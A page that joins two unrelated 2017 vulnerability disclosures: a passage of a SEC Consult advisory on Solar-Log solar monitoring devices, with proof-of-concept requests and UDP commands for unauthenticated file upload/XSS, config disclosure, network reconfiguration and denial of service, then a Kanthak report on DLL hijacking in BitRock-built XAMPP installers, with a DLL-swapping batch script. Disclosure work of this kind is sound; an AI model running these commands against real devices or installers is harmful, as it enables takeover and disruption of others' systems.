-------------------------------------------------------------------------------
POST /menu/d\_debug\_db.html HTTP/1.1
Host: <IP-Address>
\[...\]
Referer: http://<IP-Address>/menu/d\_debug\_db.html
Content-Type: multipart/form-data; boundary=--------301473270
Content-Length: 341

----------301473270
Content-Disposition: form-data; name="DESTINATION-PATH"

PoC.html
----------301473270
Content-Disposition: form-data; name="FILE-CONTENT"; filename="file.txt"
Content-Type: text/plain

<html>
 <head>
 <title>SEC-Test</title>
 </head>
 <body>
 <script>alert("XSS-PoC");</script>
 </body>
</html>
----------301473270
Content-Disposition: form-data; name="L\_UPLOAD"

Hochladen
----------301473270--
-------------------------------------------------------------------------------

The uploaded content can be reached by this link:
http://<IP-Address>/PoC.html


4) Information Disclosure (CVE-2001-1341)
This vulnerability is a known issue to IPC@CHIP since 2001.
See: http://www.securityfocus.com/bid/2767/info

The following URL can be used to open the "ChipCfg" file on a Solar-Log device:
http://<IP-Address>/ChipCfg

If an attacker is in the same subnet, he can directly request this information
from the device (the device responds to multicast) with the following command:
$ echo -n "0 1 A" >/dev/udp/<Target-IP>/8001


5) Unauthenticated Change of Network-Configuration
By using the following command a change of the network configuration can be
triggerd unauthenticated on UDP port 8001:
$ echo -n "<MAC> 4 2 0 <Desired-IP-Address> <Desired-Netmask> <Desired-Gateway>"

> /dev/udp/<Target-IP>/8001

Example:
$ echo -n "001122334455 4 2 0 192.168.4.5 255.255.255.0 192.168.4.254"

> /dev/udp/192.168.4.9/8001

6) Unauthenticated Denial of Service
By using arbitrary null characters the IPC@CHIP can be pushed into an
undesired state:
$ echo -n "<MAC> 0 <IP-Address> <Netmask> <Gateway> DDDD\\0\\0"

> /dev/udp/<Target-IP>/8001

Example:
$ echo -n "001122334455 0 192.168.4.5 255.255.255.0 192.168.4.254 DDDD\\0\\0"

> /dev/udp/192.168.4.5/8001

7) Potential Unauthenticated Reprogram of IPC@CHIP Flash Memory
This action was not tested against the device. Such attack can brick the
Solar-Log. The worst case scenario would be a botnet exploiting this vulnerability.

A network-dump of the "CHIPTOOL" would be enough to reconstruct the required
UDP packets for the attack.


Vulnerable / tested versions:
-----------------------------
Solar-Log 1200 - 3.5.2-85
Solar-Log 800e - 2.8.4-56

Since the firmware for the other Solar-Log devices is exactly the same,
other devices with the same versions are also prone to the vulnerabilities!


Vendor contact timeline:
------------------------
2017-02-02: Contacting vendor via info () solar-log com, support () solar-log com
            and berlin () solar-log com.
2017-02-14: Vendor responds and requests the advisory unencrypted; Sent the
            advisory unencrypted to the vendor.
2017-02-20: Asked for an update.
2017-02-21: Vendor states that the patch is in development. The update will
            be published before 2017-03-24.
2017-03-14: Asked for a status update. Vendor states that the update will
            be available on 2017-03-21.
2017-03-20: Vendor sends release notes. New firmware version is 3.5.3 build
            86 for all affected Solar-Log devices.
            Informing the vendor that the release of the advisory is set to
            2017-03-22.
2017-03-22: Public advisory release.


Solution:
---------
Upgrade to firmware 3.5.3-86
http://www.solar-log.com/de/service-support/downloads/firmware.html

Workaround:
-----------
Restrict network access to the devices.


Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec\_consult

EOF T. Weber / @2017

**Attachment: smime.p7s**  
_Description:_ S/MIME Cryptographic Signature

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

**Current thread:**

*   **SEC Consult SA-20170322-0 :: Multiple vulnerabilities in Solare Datensysteme Solar-Log devices** _SEC Consult Vulnerability Lab (Mar 22)_

CVE-2017-20019: Multiple vulnerabilities in Solare Datensysteme Solar-Log devices

A vulnerability was found in XAMPP 7.1.1-0-VC14. It has been classified as problematic. Affected is an unknown function of the component Installer. The manipulation leads to privilege escalation. It is possible to launch the attack remotely.

Hi @ll,

xampp-win32-7.1.1-0-VC14-installer.exe, available from  
<https://www.apachefriends.org/download.html>, is vulnerable,  
dangerous and defective.

ALL other executable installers built with BitRock InstallBuilder  
(which of course includes BitRocks InstallBuilder itself) are  
vulnerable and defective too.

0. DANGEROUS  
~~~~~~~~~~~~

0.a It instructs its unsuspecting users with a dialog box  
 ______________________________________________________________________  
| Warning                                                           [X]  
|----------------------------------------------------------------------  
|  ^  Important! Because an activated User Account Control (UAC)  
| /!\ on your system some functions of XAMPP are possibly restricted.  
| --- With UAC please avoid to install XAMPP to C:\Program Files  
|     (missing write permissions). Or deactivate UAC with msconfig  
|     after this setup.  
|                             [ OK ]  
|  
 ----------------------------------------------------------------------  
    to circumvent a security boundary or a security feature.

0.b The second alternative assumes that users don't use (unprivileged)  
    STANDARD user accounts, but the (protected) administrator account  
    created during Windows setup.

    See but Microsoft's recommendations  
    <https://technet.microsoft.com/en-us/library/ee679793.aspx>:

| Do not disable UAC  
...  
| Use standard user accounts

1. VULNERABLE  
~~~~~~~~~~~~~

1.a It loads (at least) SAMCli.dll, SchedCli.dll and LogonCli.dll  
    (tested on Windows 7 SP1) from its "application directory"  
    instead Windows' "system directory" %SystemRoot%\System32\,  
    resulting in arbitrary code execution.

    For software downloaded with a web browser the "application  
    directory" is typically the user's "Downloads" directory: see  
    <http://seclists.org/fulldisclosure/2015/Nov/101> and  
    <http://seclists.org/fulldisclosure/2015/Dec/86> plus  
    <https://insights.sei.cmu.edu/cert/2008/09/carpet-bombing-and-directory-poisoning.html>,  
    <http://blog.acrossecurity.com/2012/02/downloads-folder-binary-planting.html>,  
    <http://seclists.org/fulldisclosure/2012/Aug/134> and  
    <http://blogs.technet.com/b/srd/archive/2014/05/13/load-library-safely.aspx>

    Also see <https://cwe.mitre.org/data/definitions/426.html>,  
    <https://cwe.mitre.org/data/definitions/427.html>,  
    <https://capec.mitre.org/data/definitions/471.html> and  
    <https://skanthak.homepage.t-online.de/!execute.html>

1.b It creates 10 DLLs named BR<4tHexDigits>.tmp in the user's  
    %TEMP% directory and loads them during the installation.

    An unprivileged attacker can modify these DLLs between their  
    creation and loading, for example using the following (trivial)  
    batch script, again resulting in arbitrary code execution:

    --- BITROCK.CMD ---  
    :WAIT  
    If Not Exist "%TEMP%\BR????.DLL" Goto :WAIT  
    For %%! In ("%TEMP%\BR????.DLL") Do Copy SENTINEL.DLL "%%!"  
    --- EOF ---

    See <https://skanthak.homepage.t-online.de/sentinel.html> for  
    SENTINEL.DLL

1.c Thanks to the embedded application manifest which specifies  
    "requireAdministrator" the installer will be started with  
    administrative privileges ("protected" administrators are  
    prompted for consent, unprivileged standard users are prompted  
    for an administrator password), resulting in an escalation of  
    privilege if (one of) the DLLs named above get(s) executed!

    If (one of) the DLLs named above get(s) planted in the users  
    "Downloads" directory, for example per "drive-by download",  
    this vulnerability becomes a remote code execution WITH  
    escalation of privilege.

2. DEFECTIVE  
~~~~~~~~~~~~

2.a It has INVALID PE (section) headers; Microsoft's DUMPBIN.EXE  
    aborts with "access violation" (see below) due to the INVALID  
    section name "/4"!

    From the PE/COFF specification, available via  
    <https://www.microsoft.com/en-us/download/details.aspx?id=19509>

| Offset  Size  Field  Description  
|      0     8  Name   An 8-byte, null-padded UTF-8 encoded string.  
|                      If the string is exactly 8 characters long,  
|                      there is no terminating null. For longer names,  
|                      this field contains a slash (/) that is followed  
|                      by an ASCII representation of a decimal number  
|                      that is an offset into the string table.  
|                      Executable images do not use a string table and do  
|                      not support section names longer than 8 characters.  
|                      Long names in object files are truncated if they  
|                      are emitted to an executable file.

2.b The IMPORT directory contains 2 IMAGE_IMPORT_DESCRIPTOR entries  
    for msvcrt.dll.

    It should but have only 1 IMAGE_IMPORT_DESCRIPTOR per DLL!  
    See the PE/COFF specification:

| Import Directory Table  
...  
| The import directory table consists of an array of import directory  
| entries, one entry for each DLL to which the image refers.

Mitigations:  
~~~~~~~~~~~~

* Don't build executable installers, they are almost always vulnerable!

  Create native installation packages for the respective OS instead.  
  For Windows these are .MSI or .INF with .CAB.

* Don't use executable installers!

* stay FAR away from so called products of companies like BitRock

stay tuned  
Stefan Kanthak

Timeline:  
~~~~~~~~~

2017-02-17    vulnerability report sent to one of the customers/users  
              of BitRock, the maker of XAMPP and the equally vulnerable  
              and defective BitRock InstallBuilder

2017-02-18    reply from this customer:  
              "I have [therefore] escalated this report to Bitrock's  
               support team."

              NO REPLY from Bitrock's support team.

2017-02-19    vulnerability report sent to the german tax office: their  
              "Elster Formular" software was built with the vulnerable  
              and defective BitRock InstallBuilder too

              NO REPLY, not even an acknowledgement of receipt from the  
              german tax office

2017-02-26    vulnerability report sent to BitRock, maker of XAMPP,  
              Bitnami and BitRock InstallBuilder

2017-02-27    reply from BitRock: some lame excuses, and  
              "Thank you again for sharing all of the concerns with us."  
              but no hint/ETA for a fix

2017-02-27    vulnerability report resent to german tax office

2017-03-03    reply from german tax office:  
              "we've rebuilt our installers, the vulnerability is  
               fixed."

2017-03-06    NO, it is NOT fixed, the installer still shows the  
              reported defects/vulnerabilities

2017-03-23    reply from german tax office:  
              "we are working on an .MSI installer; ETA April 18"

2017-04-26    german tax office published .MSI installers for their  
              "Elster Formular" software

2017-05-04    report published

Evidence:  
~~~~~~~~~

C:\>link.exe /dump /headers xampp-win32-7.1.1-0-VC14-installer.exe

Microsoft (R) COFF/PE Dumper Version 8.00.50727.762  
Copyright (C) Microsoft Corporation.  All rights reserved.

Dump of file xampp-win32-7.1.1-0-VC14-installer.exe

PE signature found

File Type: EXECUTABLE IMAGE

FILE HEADER VALUES  
             14C machine (x86)  
               B number of sections  
        58071D79 time date stamp Wed Oct 19 09:15:05 2016  
          2B5C00 file pointer to symbol table  
               0 number of symbols  
              E0 size of optional header  
             32E characteristics  
                   Executable  
                   Line numbers stripped  
                   Symbols stripped  
                   Application can handle large (>2GB) addresses  
                   32 bit word machine  
                   Debug information stripped

OPTIONAL HEADER VALUES  
             10B magic # (PE32)  
            2.22 linker version  
          1D2C00 size of code  
          2B5800 size of initialized data  
            1C00 size of uninitialized data  
            12A0 entry point (004012A0)  
            1000 base of code  
          1D4000 base of data  
          400000 image base (00400000 to 006BDFFF)  
            1000 section alignment  
             200 file alignment  
            4.00 operating system version  
            1.00 image version  
            4.00 subsystem version  
               0 Win32 version  
          2BE000 size of image  
             400 size of headers  
         787749C checksum  
               2 subsystem (Windows GUI)  
             540 DLL characteristics  
                   Dynamic base  
                   NX compatible  
                   No structured exception handler  
          200000 size of stack reserve  
            1000 size of stack commit  
          100000 size of heap reserve  
            1000 size of heap commit  
               0 loader flags  
              10 number of directories  
          280000 [      6E] RVA [size] of Export Directory  
          281000 [    3C04] RVA [size] of Import Directory  
          287000 [   22B34] RVA [size] of Resource Directory  
               0 [       0] RVA [size] of Exception Directory  
         786BB58 [    10B0] RVA [size] of Certificates Directory  
          2AA000 [   13850] RVA [size] of Base Relocation Directory  
               0 [       0] RVA [size] of Debug Directory  
               0 [       0] RVA [size] of Architecture Directory  
               0 [       0] RVA [size] of Global Pointer Directory  
          286000 [      18] RVA [size] of Thread Storage Directory  
               0 [       0] RVA [size] of Load Configuration Directory  
               0 [       0] RVA [size] of Bound Import Directory  
          2819AC [     894] RVA [size] of Import Address Table Directory  
               0 [       0] RVA [size] of Delay Import Directory  
               0 [       0] RVA [size] of COM Descriptor Directory  
               0 [       0] RVA [size] of Reserved Directory

SECTION HEADER #1  
   .text name  
  1D2B94 virtual size  
    1000 virtual address (00401000 to 005D3B93)  
  1D2C00 size of raw data  
     400 file pointer to raw data (00000400 to 001D2FFF)  
       0 file pointer to relocation table  
       0 file pointer to line numbers  
       0 number of relocations  
       0 number of line numbers  
60500060 flags  
         Code  
         Initialized Data  
         RESERVED - UNKNOWN  
         RESERVED - UNKNOWN  
         Execute Read

SECTION HEADER #2  
   .data name  
   1400C virtual size  
  1D4000 virtual address (005D4000 to 005E800B)  
   14200 size of raw data  
  1D3000 file pointer to raw data (001D3000 to 001E71FF)  
       0 file pointer to relocation table  
       0 file pointer to line numbers  
       0 number of relocations  
       0 number of line numbers  
C0600040 flags  
         Initialized Data  
         RESERVED - UNKNOWN  
         RESERVED - UNKNOWN  
         Read Write

SECTION HEADER #3  
  .rdata name  
   425C0 virtual size  
  1E9000 virtual address (005E9000 to 0062B5BF)  
   42600 size of raw data  
  1E7200 file pointer to raw data (001E7200 to 002297FF)  
       0 file pointer to relocation table  
       0 file pointer to line numbers  
       0 number of relocations  
       0 number of line numbers  
40600040 flags  
         Initialized Data  
         RESERVED - UNKNOWN  
         RESERVED - UNKNOWN  
         Read Only

LINK : fatal error LNK1000: Internal error during DumpSections

  Version 8.00.50727.762

  ExceptionCode            = C0000005  
  ExceptionFlags           = 00000000  
  ExceptionAddress         = 00427362 (00400000) "C:\Program Files\...\LINK.EXE"  
  NumberParameters         = 00000002  
  ExceptionInformation[ 0] = 00000000  
  ExceptionInformation[ 1] = 00000004

CONTEXT:  
  Eax    = 40000040  Esp    = 0012E510  
  Ebx    = 0000014C  Ebp    = 00000000  
  Ecx    = 00000007  Esi    = 00000004  
  Edx    = 00000004  Edi    = 00403D00  
  Eip    = 00427362  EFlags = 00010246  
  SegCs  = 0000001B  SegDs  = 00000023  
  SegSs  = 00000023  SegEs  = 00000023  
  SegFs  = 0000003B  SegGs  = 00000000  
  Dr0    = 00000000  Dr3    = 00000000  
  Dr1    = 00000000  Dr6    = 00000000  
  Dr2    = 00000000  Dr7    = 00000000

Tag

#mac